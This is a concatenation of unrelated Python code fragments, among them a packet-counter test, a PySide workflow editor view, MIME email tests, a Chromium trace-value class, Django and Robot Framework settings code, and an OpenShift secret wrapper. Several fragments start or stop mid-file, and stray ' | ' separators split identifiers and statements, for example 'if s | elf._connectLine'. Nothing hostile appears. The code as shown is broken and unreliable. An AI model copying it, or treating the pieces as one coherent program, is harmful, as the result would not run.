# set transmission parameters, single burst of numPackets packets
HTTransmitMode(SINGLE_BURST_MODE,hub1,slot1,port1)
HTBurstCount(numPackets,hub1,slot1,port1)
# start transmitting from the first card
HTRun(HTRUN,hub1,slot1,port1)
# you could need a delay here before reading counter data
raw_input("Press ENTER key to get counts.")
# get the transmit counts from card1 then the receive counts from card2
cs = HTCountStructure()
HTGetCounters(cs, hub1, slot1, port1)
txPackets = cs.TmtPkt
HTGetCounters(cs, hub2, slot2, port2)
rxPackets = cs.RcvPkt
if txPackets == rxPackets:
print "Test Passed! %d packets transmitted and %d packets received." % (txPackets, rxPackets)
else:
print "Test Failed! %d packets transmitted and %d packets received." % (txPackets, rxPackets)
ETUn |
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with MAP Client. If not, see <http://www.gnu.org/licenses/>..
'''
import sys, math
from PySide import QtCore, QtGui
from mapclient.mountpoints.workflowstep import workflowStepFactory
from mapclient.widgets.workflowcommands import CommandSelection, CommandRemove, CommandAdd, CommandMove
from mapclient.core.workflowscene import MetaStep
from mapclient.widgets.workflowgraphicsitems import Node, Arc, ErrorItem, ArrowLine, StepPort
class WorkflowGraphicsView(QtGui.QGraphicsView):
def __init__(self, parent=None):
QtGui.QGraphicsView.__init__(self, parent)
self._selectedNodes = []
self._errorIconTimer = QtCore.QTimer()
self._errorIconTimer.setInterval(2000)
self._errorIconTimer.setSingleShot(True)
self._errorIconTimer.timeout.connect(self.errorIconTimeout)
self._errorIcon = None
self._undoStack = None
self._location = ''
self._connectLine = None
self._connectSourceNode = None
self._selectionStartPos = None
self.setCacheMode(QtGui.QGraphicsView.CacheBackground)
self.setRenderHint(QtGui.QPainter.Antialiasing)
grid_pic = QtGui.QPixmap(':/workflow/images/grid.png')
self._grid_brush = QtGui.QBrush(grid_pic)
# self.setTransformationAnchor(QtGui.QGraphicsView.AnchorUnderMouse)
# self.setResizeAnchor(QtGui.QGraphicsView.AnchorViewCenter)
self.setAcceptDrops(True)
def clear(self):
self.scene().clear()
def setUndoStack(self, stack):
self._undoStack = stack
def setLocation(self, location):
self._location = location
def connectNodes(self, node1, node2):
# Check if nodes are already connected
if not node1.hasArcToDestination(node2):
if node1.canConnect(node2):
command = CommandAdd(self.scene(), Arc(node1, node2))
self._undoStack.push(command)
else:
# add temporary line ???
if self._errorIconTimer.isActive():
self._errorIconTimer.stop()
self.errorIconTimeout()
self._errorIcon = ErrorItem(node1, node2)
self.scene().addItem(self._errorIcon)
self._errorIconTimer.start()
def selectionChanged(self):
currentSelection = self.scene().selectedItems()
previousSelection = self.scene().previouslySelectedItems()
command = CommandSelection(self.scene(), currentSelection, previousSelection)
self._undoStack.push(command)
self.scene().setPreviouslySelectedItems(currentSelection)
def nodeSelected(self, node, state):
if state == True and node not in self._selectedNodes:
self._selectedNodes.append(node)
elif state == False and node in self._selectedNodes:
found = self._selectedNodes.index(node)
del self._selectedNodes[found]
if len(self._selectedNodes) == 2:
self.connectNodes(self._selectedNodes[0], self._selectedNodes[1])
def keyPressEvent(self, event):
# super(WorkflowGraphicsView, self).keyPressEvent(event)
if event.key() == QtCore.Qt.Key_Backspace or event.key() == QtCore.Qt.Key_Delete:
command = CommandRemove(self.scene(), self.scene().selectedItems())
self._undoStack.push(command)
event.accept()
else:
event.ignore()
def contextMenuEvent(self, event):
item = self.itemAt(event.pos())
if item and item.type() == Node.Type:
item.showContextMenu(event.globalPos())
def mousePressEvent(self, event):
item = self.scene().itemAt(self.mapToScene(event.pos()))
if event.button() == QtCore.Qt.RightButton:
event.ignore()
elif item and item.type() == StepPort.Type:
centre = item.boundingRect().center()
self._connectSourceNode = item
self._connectLine = ArrowLine(QtCore.QLineF(item.mapToScene(centre),
self.mapToScene(event.pos())))
self.scene().addItem(self._connectLine)
else:
QtGui.QGraphicsView.mousePressEvent(self, event)
self._selectionStartPos = event.pos()
def mouseMoveEvent(self, event):
if s | elf._connectLine:
newLine = QtCore.QLineF(self._connectLine.line().p1(), self.mapToScene(event.pos()))
self._connectLine.setLine(newLine)
else:
QtGui.QGraphicsView.mouseMoveEvent(self, event)
def mouseReleaseEvent(self, event):
if self._connectLine:
item = self.scene().itemAt(self.mapToScene(event.pos()))
if item and item.type() == StepPort.Type:
self.connectNodes(self._connect | SourceNode, item)
self.scene().removeItem(self._connectLine)
self._connectLine = None
self._connectSourceNode = None
else:
QtGui.QGraphicsView.mouseReleaseEvent(self, event)
if self._selectionStartPos:
diff = event.pos() - self._selectionStartPos
if diff.x() != 0 and diff.y() != 0:
self._undoStack.beginMacro('Move Step(s)')
for item in self.scene().selectedItems():
if item.type() == Node.Type:
self._undoStack.push(CommandMove(item, item.pos() - diff, item.pos()))
self._undoStack.endMacro()
def errorIconTimeout(self):
self.scene().removeItem(self._errorIcon)
del self._errorIcon
def changeEvent(self, event):
if event.type() == QtCore.QEvent.EnabledChange:
self.invalidateScene(self.sceneRect())
def drawBackground(self, painter, rect):
# Shadow.
sceneRect = self.sceneRect()
rightShadow = QtCore.QRectF(sceneRect.right(), sceneRect.top() + 5, 5, sceneRect.height())
bottomShadow = QtCore.QRectF(sceneRect.left() + 5, sceneRect.bottom(), sceneRect.width(), 5)
if rightShadow.intersects(rect) or rightShadow.contains(rect):
painter.fillRect(rightShadow, QtCore.Qt.darkGray)
if bottomShadow.intersects(rect) or bottomShadow.contains(rect):
painter.fillRect(bottomShadow, QtCore.Qt.darkGray)
painter.setBrush(self._grid_brush) # QtCore.Qt.NoBrush
painter.drawRect(sceneRect)
def dropEvent(self, event):
if event.mimeData().hasFormat("image/x-workflow-step"):
pieceData = event.mimeData().data("image/x-workflow-step")
stream = QtCore.QDataStream(pieceData, QtCore.QIODevice.ReadOnly)
hotspot = QtCore.QPoint()
nameLen = stream.readUInt32()
name = stream.readRawData(nameLen).decode(sys.stdout.encoding)
stream >> hotspot
scene = self.scene()
position = self.mapToScene(event.pos() - hotspot)
metastep = MetaStep(workflowStepFactory(name, self._location))
node = Node(metastep)
metastep._step.registerConfiguredObserver(scene.stepConfigured)
metastep._step.registerDoneExecution(scene.doneExecution)
metastep._step.registerOnExecuteEntry(scene.setCurrentWidget)
metastep._step.registerIdentifierOccursCount(scene.identifierOccursCount)
self._undoStack.beginMacro('Add node')
self._undoStack.push(CommandAdd(scene, node))
# Set the position after it has been added to the scene
self._undoStack.push(CommandMove(node, position, scene.ensureItemInScene(node, position)))
scene.clearSelection()
node.setSelected(True)
self._undoStack.endMacro()
self.setFocus()
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData(). |
ate.from_string(IPHONE)
parts = list(message.walk())
message = create.from_message(parts[2])
eq_(u'\n\n\n~Danielle', message.body)
def message_from_garbage_test():
assert_raises(errors.DecodingError, create.from_string, None)
assert_raises(errors.DecodingError, create.from_string, [])
assert_raises(errors.DecodingError, create.from_string, MimePart)
def create_singlepart_ascii_test():
message = create.text("plain", u"Hello")
message = create.from_string(message.to_string())
eq_("7bit", message.content_encoding.value)
eq_("Hello", message.body)
def create_singlepart_unicode_test():
message = create.text("plain", u"Привет, курилка")
message = create.from_string(message.to_string())
eq_("base64", message.content_encoding.value)
eq_(u"Привет, курилка", message.body)
def create_singlepart_ascii_long_lines_test():
very_long = "very long line " * 1000 + "preserve my newlines \r\n\r\n"
message = create.text("plain", very_long)
message2 = create.from_string(message.to_string())
eq_("quoted-printable", message2.content_encoding.value)
eq_(very_long, message2.body)
message2 = email.message_from_string(message.to_string())
eq_(very_long, message2.get_payload(decode=True))
def create_multipart_simple_test():
message = create.multipart("mixed")
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"))
ok_(message.is_root())
assert_false(message.parts[0].is_root())
assert_false(message.parts[1].is_root())
message2 = create.from_string(message.to_string())
eq_(2, len(message2.parts))
eq_("multipart/mixed", message2.content_type)
eq_(2, len(message.parts))
eq_("Hello", message.parts[0].body)
eq_("<html>Hello</html>", message.parts[1].body)
message2 = email.message_from_string(message.to_string())
eq_("multipart/mixed", message2.get_content_type())
eq_("Hello", message2.get_payload()[0].get_payload(decode=False))
eq_("<html>Hello</html>",
message2.get_payload()[1].get_payload(decode=False))
def create_multipart_with_attachment_test():
message = create.multipart("mixed")
filename = u"Мейлган картиночка картиночечка с длинным именем и пробельчиками"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
create.binary(
"image", "png", MAILGUN_PNG,
filename, "attachment"))
eq_(3, len(message.parts))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
eq_("base64", message2.parts[2].content_encoding.value)
eq_(MAILGUN_PNG, message2.parts[2].body)
eq_(filename, message2.parts[2].content_disposition.params['filename'])
eq_(filename, message2.parts[2].content_type.params['name'])
ok_(message2.parts[2].is_attachment())
message2 = email.message_from_string(message.to_string())
eq_(3, len(message2.get_pa | yload()))
eq_(MAILGUN_PNG, message2.get_payload()[2].get_payload(decode= | True))
def create_multipart_with_text_non_unicode_attachment_test():
"""Make sure we encode text attachment in base64
"""
message = create.multipart("mixed")
filename = "text-attachment.txt"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
create.binary(
"text", "plain", u"Саша с уралмаша".encode("koi8-r"),
filename, "attachment"))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
attachment = message2.parts[2]
ok_(attachment.is_attachment())
eq_("base64", attachment.content_encoding.value)
eq_(u"Саша с уралмаша", attachment.body)
def create_multipart_with_text_non_unicode_attachment_preserve_encoding_test():
"""Make sure we encode text attachment in base64
and also preserve charset information
"""
message = create.multipart("mixed")
filename = "text-attachment.txt"
message.append(
create.text("plain", "Hello"),
create.text("html", "<html>Hello</html>"),
create.text(
"plain",
u"Саша с уралмаша 2".encode("koi8-r"),
"koi8-r",
"attachment",
filename))
message2 = create.from_string(message.to_string())
eq_(3, len(message2.parts))
attachment = message2.parts[2]
ok_(attachment.is_attachment())
eq_("base64", attachment.content_encoding.value)
eq_("koi8-r", attachment.charset)
eq_(u"Саша с уралмаша 2", attachment.body)
def create_multipart_nested_test():
message = create.multipart("mixed")
nested = create.multipart("alternative")
nested.append(
create.text("plain", u"Саша с уралмаша"),
create.text("html", u"<html>Саша с уралмаша</html>"))
message.append(
create.text("plain", "Hello"),
nested)
message2 = create.from_string(message.to_string())
eq_(2, len(message2.parts))
eq_('text/plain', message2.parts[0].content_type)
eq_('Hello', message2.parts[0].body)
eq_(u"Саша с уралмаша", message2.parts[1].parts[0].body)
eq_(u"<html>Саша с уралмаша</html>", message2.parts[1].parts[1].body)
def create_enclosed_test():
message = create.text("plain", u"Превед")
message.headers['From'] = u' Саша <sasha@mailgun.net>'
message.headers['To'] = u'Женя <ev@mailgun.net>'
message.headers['Subject'] = u"Все ли ок? Нормальненько??"
message = create.message_container(message)
message2 = create.from_string(message.to_string())
eq_('message/rfc822', message2.content_type)
eq_(u"Превед", message2.enclosed.body)
eq_(u'Саша <sasha@mailgun.net>', message2.enclosed.headers['From'])
def create_enclosed_nested_test():
nested = create.multipart("alternative")
nested.append(
create.text("plain", u"Саша с уралмаша"),
create.text("html", u"<html>Саша с уралмаша</html>"))
message = create.multipart("mailgun-recipient-variables")
variables = {"a": u"<b>Саша</b>" * 1024}
message.append(
create.binary("application", "json", json.dumps(variables)),
create.message_container(nested))
message2 = create.from_string(message.to_string())
eq_(variables, json.loads(message2.parts[0].body))
nested = message2.parts[1].enclosed
eq_(2, len(nested.parts))
eq_(u"Саша с уралмаша", nested.parts[0].body)
eq_(u"<html>Саша с уралмаша</html>", nested.parts[1].body)
def guessing_attachments_test():
binary = create.binary(
"application", 'octet-stream', MAILGUN_PNG, '/home/alex/mailgun.png')
eq_('image/png', binary.content_type)
eq_('mailgun.png', binary.content_type.params['name'])
binary = create.binary(
"application", 'octet-stream',
MAILGUN_PIC, '/home/alex/mailgun.png', disposition='attachment')
eq_('attachment', binary.headers['Content-Disposition'].value)
eq_('mailgun.png', binary.headers['Content-Disposition'].params['filename'])
binary = create.binary(
"application", 'octet-stream', NOTIFICATION, '/home/alex/mailgun.eml')
eq_('message/rfc822', binary.content_type)
binary = create.binary(
"application", 'octet-stream', MAILGUN_WAV, '/home/alex/audiofile.wav')
eq_('audio/x-wav', binary.content_type)
def attaching_emails_test():
attachment = create.attachment(
"message/rfc822", MULTIPART, "message.eml", "attachment")
eq_("message/rfc822", attachment.content_type)
ok_(attachment.is_attachment())
# now guess by file name
attachment = create.attachment(
"application/octet-stream", MULTIPART, "message.eml", "attachment")
eq_("message/rfc822", attachment.content_type)
def attaching_broken_emails_test():
attachment = create.attachment(
"application/octet-stream", FALSE_MULTIPART, "message.eml", "attachment")
ok_(attachment.is_attachment())
eq_("application/octet-stream", attachment.content_type)
def attaching_images_test():
attachment = create.attachment(
"application/octet-stream", MAILGUN_PNG, "/home/alex/mailgun.png") |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import logging
import os
import random
import shutil
import StringIO
import sys
import tempfile
from catapult_base import cloud_storage # pylint: disable=import-error
from telemetry.internal.util import file_handle
from telemetry.timeline import trace_data as trace_data_module
from telemetry import value as value_module
from tracing_build import trace2html
class TraceValue(value_module.Value):
def __init__(self, page, trace_data, important=False, description=None):
"""A value that contains a TraceData object and knows how to
output it.
Adding TraceValues and outputting as JSON will produce a directory full of
HTML files called trace_files. Outputting as chart JSON will also produce
an index, files.html, linking to each of these files.
"""
super(TraceValue, self).__init__(
page, name='trace', units='', important=important,
description=description, tir_label=None)
self._temp_file = self._GetTempFileHandle(trace_data)
self._cloud_url = None
self._serialized_file_handle = None
def _GetTempFileHandle(self, trace_data):
if self.page:
title = self.page.display_name
else:
title = ''
content = StringIO.StringIO()
trace2html.WriteHTMLForTraceDataToFile(
[trace_data.GetEventsFor(trace_data_module.CHROME_TRACE_PART)],
title,
content)
tf = tempfile.NamedTemporaryFile(delete=False, suffix='.html')
tf.write(content.getvalue().encode('utf-8'))
tf.close()
return file_handle.FromTempFile(tf)
def __repr__(self):
if self.page:
page_name = self.page.display_name
else:
page_name = 'None'
return 'TraceValue(%s, %s)' % (page_name, self.name)
def CleanUp(self):
"""Cleans up tempfile after it is no longer needed.
A cleaned up TraceValue cannot be used for further operations. CleanUp()
may be called more than once without error.
"""
if self._temp_file is None:
return
os.remove(self._temp_file.GetAbsPath())
self._temp_file = None
def __enter__(self):
return self
def __exit__(self, _, __, ___):
self.CleanUp()
@property
def cleaned_up(self):
return self._temp_file is None
def GetBuildbotDataType(self, output_context):
return None
def GetBuildbotValue(self):
return None
def GetRepresentativeNumber(self):
return None
def GetRepresentativeString(self):
return None
@staticmethod
def GetJSONTypeName():
return 'trace'
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
assert len(values) > 0
return values[0]
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values):
return None
def AsDict(self):
if self._temp_file is None:
raise ValueError('Tried to serialize TraceValue without tempfile.')
d = super(TraceValue, self).AsDict()
if self._serialized_file_handle:
d['file_id'] = self._serialized_file_handle.id
if self._cloud_url:
d['cloud_url'] = self._cloud_url
return d
def Serialize(self, dir_path):
if self._temp_file is None:
raise ValueError('Tried to serialize nonexistent trace.')
file_name = str(self._temp_file.id) + self._temp_file.extension
file_path = os.path.abspath(os.path.join(dir_path, file_name))
shutil.copy(self._temp_file.GetAbsPath(), file_path)
self._serialized_file_handle = file_handle.FromFilePath(file_path)
return self._serialized_file_handle
def UploadToCloud(self, bucket):
if self._temp_file is None:
raise ValueError('Tried to upload nonexistent trace to Cloud Storage.')
try:
if self._serialized_file_handle:
fh = self._serialized_file_handle
else:
fh = self._temp_file
remote_path = ('trace-file-id_%s-%s-%d%s' % (
fh.id,
datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'),
random.randint(1, 100000),
| fh.extension))
self._cloud_url = cloud_storage.Insert(
bucket, remote_path, fh.GetAbsPath())
sys.stderr.w | rite(
'View generated trace files online at %s for page %s\n' %
(self._cloud_url, self.page.url if self.page else 'unknown'))
return self._cloud_url
except cloud_storage.PermissionError as e:
logging.error('Cannot upload trace files to cloud storage due to '
' permission error: %s' % e.message)
|
import unittest
import os
from nose.tools import assert_true
from nose.tools import assert_false
from pyvault import PyVault
from pyvault.backends.file import PyVaultFileBackend
from pyvault.backends.ptree import PyVaultPairtreeBackend
class VaultStore(unittest.TestCase):
"""
testing storing data into the vault with different
backends and their resulting files.
"""
def test_store_file(self):
backend = PyVaultFileBackend("/tmp/_pyvault_file")
vault = PyVault(backend)
vault.unlock("passphrase", False)
assert_false(vault.is_locked())
vault.store("key", "secret")
assert_true(os.path.isfile("/tmp/_pyvault_file/8335fa56d487562de248f47befc72743334051ddffcc2c09275f665454990317594 | 745ee17c08f798cd7dce0ba8155dcda14f6398c1d1545116520a133017c09"))
def test_store_ptree(self):
backend = PyVaultPairtreeBackend("/tmp/_pyvault_ptree")
vault = PyVault(backend)
vault. | unlock("passphrase", False)
assert_false(vault.is_locked())
vault.store("key", "secret")
assert_true(os.path.isfile("/tmp/_pyvault_ptree/pairtree_root/83/35/fa/56/d4/87/56/2d/e2/48/f4/7b/ef/c7/27/43/33/40/51/dd/ff/cc/2c/09/27/5f/66/54/54/99/03/17/59/47/45/ee/17/c0/8f/79/8c/d7/dc/e0/ba/81/55/dc/da/14/f6/39/8c/1d/15/45/11/65/20/a1/33/01/7c/09/obj/data"))
|
import datetime
import os
from django.db.models.fields.files import FileField
from django.core.files.storage import default_storage
from django.utils.encoding import force_unicode, smart_str
class ModelUploadFileField(FileField):
"""
Makes the upload_to parameter optional by using the name of the model
"""
def __init__(self, verbose_name=None, name=None, storage=None, **kwargs):
for arg in ('primary_key', 'unique'):
if arg in kwargs:
raise TypeError("'%s' is not a valid argument for %s." % (arg, self.__class__))
self.storage = storage or default_storage
upload_to = kwargs.pop('upload_to', '$$MODEL$$')
if not upload_to:
upload_to = '$$MODEL$$'
self.upload_to = upload_to
if callable(upload_to):
self.generate_filename = upload_to
kwargs['max_length'] = kwargs.get('max_length', 100)
super(FileField, self).__init__(verbose_name, name, **kwargs)
def get_directory_name(self):
return os.path.normpath(force_unicode(datetime.datetime.now().strftime(smart_str(self.upload_to))))
def generate_filename(self, instance, filename):
| if self.upload_to == '$$MODEL$$':
self.upload_to = in | stance._meta.verbose_name
return os.path.join(self.get_directory_name(), self.get_filename(filename))
|
# -*- coding: utf8 -*-
u"""
Тесты на ДЗ#5.
"""
__author__ = "wowkalucky"
__email__ = "wowkalucky@gmail.com"
__date__ = "2014-11-17"
import datetime
from hw5_solution1 import Person
def tests_for_hw5_solution1():
u"""Тесты задачи 1"""
petroff = Person("Petrov", "Petro", "1952-01-02")
ivanoff = Person("Ivanov", "Ivan", "2000-10-20")
sydoroff = Person("Sidorov", "Semen", "1980-12-31", "Senya")
assert "first_name" in dir(petroff)
assert "get_fullname" in dir(ivanoff)
ass | ert "nickname" not in dir(petroff)
assert "nickname" in dir(sydoroff)
assert petroff.surname == "Petrov"
assert petroff.first_name == "Petro"
assert petroff.get_fullname() == "Petrov Petro"
assert sydoroff.nickname == "Senya"
assert petroff.birth_dat | e == datetime.date(1952, 01, 02)
assert isinstance(petroff.birth_date, datetime.date)
assert petroff.get_age() == "62"
print 'All is Ok!' |
efault_value(self, name):
return self._cli_opts[name][1]
def _split_args_from_name_or_path(self, name):
if os.path.exists(name):
return os.path.abspath(name), []
index = self._get_arg_separator_index_from_name_or_path(name)
if index == -1:
return name, []
args = name[index+1:].split(name[index])
name = name[:index]
if os.path.exists(name):
name = os.path.abspath(name)
return name, args
def _get_arg_separator_index_from_name_or_path(self, name):
colon_index = name.find(':')
# Handle absolute Windows paths
if colon_index == 1 and name[2:3] in ('/', '\\'):
colon_index = name.find(':', colon_index+1)
semicolon_index = name.find(';')
if colon_index == -1:
return semicolon_index
if semicolon_index == -1:
return colon_index
return min(colon_index, semicolon_index)
def _validate_remove_keywords(self, values):
for value in values:
try:
KeywordRemover(value)
except DataError as err:
raise DataError("Invalid value for option '--removekeywords'. %s" % err)
def _validate_flatten_keywords(self, values):
for value in values:
try:
FlattenKeywordMatcher(value)
except DataError as err:
raise DataError("Invalid value for option '--flattenkeywords'. %s" % err)
def __contains__(self, setting):
return setting in self._cli_opts
def __unicode__(self):
return '\n'.join('%s: %s' % (name, self._opts[name])
for name in sorted(self._opts))
@property
def output(self):
return self['Output']
@property
def log(self):
return self['Log']
@property
def report(self):
return self['Report']
@property
def xunit(self):
return self['XUnit']
@property
def split_log(self):
return self['SplitLog']
@property
def status_rc(self):
return self['StatusRC']
@property
def xunit_skip_noncritical(self):
return self['XUnitSkipNonCritical']
@property
def statistics_config(self):
return {
'suite_stat_level': self['SuiteStatLevel'],
'tag_stat_include': self['TagStatInclude'],
'tag_stat_exclude': self['TagStatExclude'],
'tag_stat_combine': self['TagStatCombine'],
'tag_stat_link': self['TagStatLink'],
'tag_doc': self['TagDoc'],
}
@property
def critical_tags(self):
return self['Critical']
@property
def non_critical_tags(self):
return self['NonCritical']
@property
def remove_keywords(self):
return self['RemoveKeywords']
@property
def flatten_keywords(self):
return self['FlattenKeywords']
class RobotSettings(_BaseSettings):
_extra_cli_opts = {'Output' : ('output', 'output.xml'),
'LogLevel' : ('loglevel', 'INFO'),
'DryRun' : ('dryrun', False),
'ExitOnFailure' : ('exitonfailure', False),
'ExitOnError' : ('exitonerror', False),
'SkipTeardownOnExit' : ('skipteardownonexit', False),
'Randomize' : ('randomize', 'NONE'),
'RunEmptySuite' : ('runemptysuite', False),
'WarnOnSkipped' : ('warnonskippedfiles', False),
'Variables' : ('variable', []),
'VariableFiles' : ('variablefile', []),
'Listeners' : ('listener', []),
'MonitorWidth' : ('monitorwidth', 78),
'MonitorMarkers' : ('monitormarkers', 'AUTO'),
'DebugFile' : ('debugfile', None)}
def get_rebot_settings(self):
settings = RebotSettings()
settings._opts.update(self._opts)
for name in ['Variables', 'VariableFiles', 'Listeners']:
del(settings._opts[name])
for name in ['Include', 'Exclude', 'TestNames', 'SuiteNames', 'Metadata']:
settings._opts[name] = []
for name in ['Name', 'Doc']:
settings._opts[name] = None
settings._opts['Output'] = None
settings._opts['LogLevel'] = 'TRACE'
settings._opts['ProcessEmptySuite'] = self['RunEmptySuite']
return settings
def _output_disabled(self):
return self.output is None
def _escape_as_data(self, value):
return utils.escape(value)
@property
def suite_config(self):
return {
'name': self[' | Name'],
'doc': self['Doc'],
'metadata': dict(self['Met | adata']),
'set_tags': self['SetTag'],
'include_tags': self['Include'],
'exclude_tags': self['Exclude'],
'include_suites': self['SuiteNames'],
'include_tests': self['TestNames'],
'empty_suite_ok': self['RunEmptySuite'],
'randomize_suites': self.randomize_suites,
'randomize_tests': self.randomize_tests,
'randomize_seed': self.randomize_seed,
}
@property
def randomize_seed(self):
return self['Randomize'][1]
@property
def randomize_suites(self):
return self['Randomize'][0] in ('suites', 'all')
@property
def randomize_tests(self):
return self['Randomize'][0] in ('tests', 'all')
@property
def dry_run(self):
return self['DryRun']
@property
def exit_on_failure(self):
return self['ExitOnFailure']
@property
def exit_on_error(self):
return self['ExitOnError']
@property
def skip_teardown_on_exit(self):
return self['SkipTeardownOnExit']
@property
def log_level(self):
return self['LogLevel']
@property
def console_logger_config(self):
return {
'width': self['MonitorWidth'],
'colors': self['MonitorColors'],
'markers': self['MonitorMarkers'],
'stdout': self['StdOut'],
'stderr': self['StdErr']
}
class RebotSettings(_BaseSettings):
_extra_cli_opts = {'Output' : ('output', None),
'LogLevel' : ('loglevel', 'TRACE'),
'ProcessEmptySuite' : ('processemptysuite', False),
'StartTime' : ('starttime', None),
'EndTime' : ('endtime', None),
'Merge' : ('merge', False),
'DeprecatedMerge' : ('rerunmerge', False)}
def _output_disabled(self):
return False
@property
def suite_config(self):
return {
'name': self['Name'],
'doc': self['Doc'],
'metadata': dict(self['Metadata']),
'set_tags': self['SetTag'],
'include_tags': self['Include'],
'exclude_tags': self['Exclude'],
'include_suites': self['SuiteNames'],
'include_tests': self['TestNames'],
'empty_suite_ok': self['ProcessEmptySuite'],
'remove_keywords': self.remove_keywords,
'log_level': self['LogLevel'],
'critical_tags': self.critical_tags,
'non_critical_tags': self.non_critical_tags,
'start_time': self['StartTime'],
'end_time': self['EndTime']
}
@property
def log_config(self):
if not self.log:
return {}
return {
'title': utils.html_escape(self['LogTitle'] or ''),
'reportURL': self._url_from_path(self.log, self.report),
'splitLogBase': os.path.basename(os.path.splitext(self.log)[0]),
'defaultLevel': self['VisibleLogLevel']
}
@property
def report_config(self):
if not self.report:
return {}
return {
'title |
# -*- coding: utf-8 | -*-
from django.db import migrations
class Migration(migrations.Migratio | n):
dependencies = [
('demosite', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='homepage',
options={'verbose_name': 'homepage'},
),
]
|
a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry == None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# pylint: disable=no-member,maybe-no-member
if entry.has_key(key_or_item):
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# pylint: disable=no-member,maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry == None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# pylint: disable=no-member,maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a d | ict '''
try:
entry = Yedit.get_entry(self. | yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if isinstance(entry, dict):
# pylint: disable=no-member,maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in dict with non-dict type.' \
' value=[%s] [%s]' % (value, type(value)))
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# pylint: disable=no-member,maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index != None:
ind = index
if ind != None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
#already exists, return
if ind != None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError as _:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict, default_flow_style=False), yaml.RoundTripLoader)
# pylint: disable=no-member
if hasattr(self.yaml_dict, 'fa'):
tmp_copy.fa.set_block_style()
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if not result:
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict, default_flow_style=False), yaml.RoundTripLoader)
# pylint: disable=no-member
if hasattr(self.yaml_dict, 'fa'):
tmp_copy.fa.set_block_style()
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
import base64
# pylint: disable=too-many-arguments
class Secret(OpenShiftCLI):
''' Class to wrap the oc command line tools
'''
def __init__(self,
namespace,
secret_name=None,
decode=False,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False):
''' Constructor for OpenshiftOC '''
super(Secret, self).__init__(namespace, kubeconfig)
self.namespace = namespace
self.name = secret_name
self.kubeconfig = kubeconfig
self.decode = decode
self.verbose = verbose
def get(self):
'''return a secret by name '''
results = self._get('secrets', self.name)
results['decoded'] = {}
results['exists'] = False
if results['returncode'] == 0 and results['results'][0]:
results['exists'] = True
if self.decode:
if results['results'][0].has_key('data'):
for sname, value in results['results'][0]['data'].items():
results['decoded'][sname] = base64.decodestring(value)
if results['returncode'] != 0 and '"%s" not found' % self.name in results['stderr']:
results['returncode'] = 0
return results
def delete(self):
'''delete a secret by name'''
return self._delete('secrets', self.name)
def create(self, files=None, contents=None, content_type=None):
'''Create a secret '''
if not files:
files = Utils.create_files_from_contents(contents, content_type=content_type)
secrets = ["%s=%s" % (sfile['name'], sfile['path']) for sfile in files]
cmd = ['-n%s' % self.namespace, 'secrets', 'new', self.name]
cmd.extend(secrets)
return self.openshift_cmd(cmd)
def update(self, files, force=False):
'''run update secret
This receives a list of file names and converts it into a secret.
The secret is then written to disk and passed into the `oc replace` command.
'''
